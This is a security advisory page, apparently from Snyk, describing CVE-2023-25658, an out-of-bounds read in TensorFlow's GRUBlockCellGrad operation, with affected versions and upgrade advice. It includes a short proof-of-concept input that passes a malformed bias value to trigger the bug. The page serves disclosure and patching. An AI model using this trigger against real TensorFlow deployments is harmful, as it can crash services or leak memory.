Out-of-bounds Read Affecting tensorflow package, versions [,2.11.1) [2.12.0rc0,2.12.0)
Threat Intelligence
Exploit Maturity
Proof of concept
EPSS
0.09% (41st
percentile)
Do your applications use this vulnerable package?
In a few clicks we can analyze your entire application and see what components are vulnerable in your application, and suggest you quick fixes.
Test your applications- Snyk ID SNYK-PYTHON-TENSORFLOW-3372987
- published 26 Mar 2023
- disclosed 26 Mar 2023
- credit r3pwnx
Introduced: 26 Mar 2023
CVE-2023-25658 Open this link in a new tabHow to fix?
Upgrade tensorflow
to version 2.11.1, 2.12.0 or higher.
Overview
tensorflow is a machine learning framework.
Affected versions of this package are vulnerable to Out-of-bounds Read in GRUBlockCellGrad
.
PoC
func = tf.raw_ops.GRUBlockCellGrad
para = {'x': [[21.1, 156.2], [83.3, 115.4]], 'h_prev': array([[136.5],
[136.6]]), 'w_ru': array([[26.7, 0.8],
[47.9, 26.1],
[26.2, 26.3]]), 'w_c': array([[ 0.4],
[31.5],
[ 0.6]]), 'b_ru': array([0.1, 0.2 ], dtype=float32), 'b_c': 0x41414141, 'r': array([[0.3],
[0.4]], dtype=float32), 'u': array([[5.7],
[5.8]]), 'c': array([[52.9],
[53.1]]), 'd_h': array([[172.2],
[188.3 ]])}
References
CVSS Scores
version 3.1